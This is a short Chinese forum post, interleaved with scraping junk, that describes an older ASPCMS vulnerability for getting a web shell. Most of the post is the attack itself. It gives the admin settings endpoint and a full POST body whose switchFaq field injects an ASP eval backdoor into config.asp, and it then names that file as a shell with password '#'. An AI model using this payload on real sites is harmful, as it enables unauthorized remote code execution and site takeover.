老的ASPCMS版本的秒杀拿SHELL漏洞
& v0 d1 ?* i$ s$ V- V( Q
$ Y9 N9 J. c3 T1 e 找到后台。。。然后, a2 C2 e5 G( n$ m) b
" E2 [7 h W" W: z U& Q2 ^/admin/_system/AspCms_SiteSetting.asp?action=saves
" }8 p; w1 |% n% u* Z ' `6 K1 c0 e$ g, C' x
直接POST. E0 {. \, K; d0 @
: V2 n" x1 x. N3 y4 w
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
$ V! C# S X( Y) U0 l
' U5 k M V, M; c- J再连接配置文件config.asp 密码为#+ E' H' m" A- \5 j% h' p# S
|